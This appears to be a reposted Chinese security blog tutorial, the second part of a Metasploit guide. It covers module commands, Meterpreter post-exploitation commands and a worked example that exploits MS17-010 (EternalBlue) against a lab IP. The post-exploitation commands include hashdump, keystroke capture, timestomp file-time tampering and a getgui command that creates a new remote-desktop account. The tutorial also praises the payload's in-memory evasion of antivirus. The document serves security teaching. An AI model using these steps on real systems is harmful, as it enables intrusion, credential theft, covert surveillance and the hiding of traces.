文章总结： 本文是Metasploit框架技术指南的第二部分，重点介绍MSF攻击前后的常用命令操作流程。文档详细列举了攻击前的search、use、set等模块管理命令，以及成功获取Meterpreter会话后的文件操作、权限提升、信息收集等后渗透指令。通过MS17-010漏洞利用实例演示了从漏洞扫描到获取系统权限的完整攻击链，并强调Meterpreter内存驻留特性及其在内网渗透中的代理功能。 综合评分： 75 文章分类： 渗透测试,安全工具,实战经验,红队,内网渗透

---

Metasploit漏洞利用 | 被安全社区誉为可以“黑掉整个宇宙”的神器-2

原创

d0ublewei d0ublewei

大伯为安全

2024年9月9日 14:35 湖北

在小说阅读器读本章

去阅读

01**

概述

MSF 的基本介绍在上篇文章中已经提到，具体内容可以跳转上篇文章查看。

大闹天宫 | 被安全社区誉为可以“黑掉整个宇宙”的神器-1

02**

MSF攻击之前常见命令

help：命令帮助

search：查找模块

search mysql  查找与 mysql 相关的模块
search mysql type:auxiliary    查找类型为 auxiliary 的模块
search mysql rank:excellent    查找排名为 excellent 的模块

use：打开一个模块

show：查看模块

show options    查看模块怎么使用
show missing  查看模块必配但未配的选项
show advanced  查看模块高级选项

set：配置目标 ip 等相关选项

unset：取消配置的选项值

setg：配置全局选项

info：查看模块帮助详情

sava：保存配置的相关参数

exploit：攻击

run：运行

back：退到上一层目录

03**

MSF攻击成功之后常见命令（meterpreter）

sessions -l：列出当前所有会话

sessions id：进入某个会话

sessions -u id：将某个会话转为 meterpreter

background：将当前会话挂起

shell：攻击之后进入对方系统命令行

upload：文件上传

download：文件下载

execute -f：执行目标系统上的程序

getsystem ：提升为管理员权限

sysinfo ：查看目标系统信息

screenshot ：截取目标系统桌面

keyscan_start ：开始捕获击键，需要 administrator 权限

keyscan_dump ：转储击键缓冲区

keyscan_stop ：停止捕获击键

timestomp ：显示/修改目标系统某文件的修改/访问/创建时间

timestomp -v aaa.txt
timestomp -m '05/20/2008 9:00:00' aaa.txt

还可以执行查看目标摄像头等操作

04**

Meterpreter

概述

具体操作之前了解一下 Meterpreter。

一般我们让目标上线就是把对方上线到我们自己攻击机的 Meterpreter，方便后续做很多后渗透相关的操作，因为 Meterpreter 提供了非常多的功能。

MSF 提供了各个主流平台的 Meterpreter 版本，包括 Windows、Linux，同时支持 x86、x64 平台，另外 Meterpreter 还提供了基于 PHP 和 JAVA 语言的实现。

Meterpreter 的工作模式是纯内存的，好处是启动隐藏，很难被杀毒软件监测到。不需要访问目标主机磁盘，所以也没什么入侵的痕迹。

相当于是攻击机和被攻击机中间的连接模块。

功能

快速提权

getsystem

命令快速提权。一条指令你就拥有了 System 权限。

Meterpreter 会自己尝试用多种方法让你获得 System 权限。

#

Hashdump

run post/windows/gather/hashdump

一条命令你就能够获得 Windows 的 sam 数据库里的内容，但是经过加密的密码。

#

打开远程桌面

getgui

这个命令能够让你轻松的让目标系统打开 3389 远程管理。

这条命令有两个用法：

run getgui -e  # 仅仅是打开远程管理
run getgui -u test -p 123.com  # 打开远程管理并且创造一个新的用户名为 test，密码为 123.com 的帐号

网络中继（代理）

• 黑客入侵内网碰到的最大困难就是无法穿越 NAT。

• 现在有了 Meterpreter 就轻松了，Meterpreter 能够让一台你已经入侵的电脑变成中继（代理），来入侵同一个局域网里的其他电脑。

#

截屏

• 截取目标系统的桌面图片。

#

还有很多其它操作……

05**

举例—系统服务漏洞利用

首先进入 msf

msfconsole

搜索可使用的漏洞利用模块

search ms17-010

这里我们先使用漏洞扫描模块（辅助模块），确认目标是否存在对应漏洞。设置目标地址后开始扫描

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.49.140
run

确认存在漏洞，然后使用漏洞攻击模块开始攻击。设置必要参数，run 起来

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp    # 默认就是这个，可以不敲
set rhost 192.168.49.140
set lhost 192.168.49.139
exploit 或 run

成功拿到目标权限！执行 shell 命令，可以进入目标的命令行界面执行系统命令。

未完待续……

关注公众号，发送消息”MSF“获取环境和工具

END

往期精彩回顾

前后端交互 | 前端发送请求的几种方式，你知道吗？

数组 | 想要高效存储多个值？这个”变量”能帮你！

干它 | 红队内网渗透-域渗透-1

书接上回 | 红队内网渗透技术-域渗透-2

最后一战 | 红队内网渗透技术-域渗透-3

墙裂推荐！！一键更换Linux优质的软件源和docker源，要多方便有多方便

frp | 开源内网穿透利器，速速用起来

大闹天宫 | 被安全社区誉为可以“黑掉整个宇宙”的神器-1

点击关注

渗透测试

信息安全

安全工具

戳“阅读原文”一起来充电吧!

---

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：大伯为安全 d0ublewei d0ublewei《Metasploit漏洞利用 | 被安全社区誉为可以“黑掉整个宇宙”的神器-2》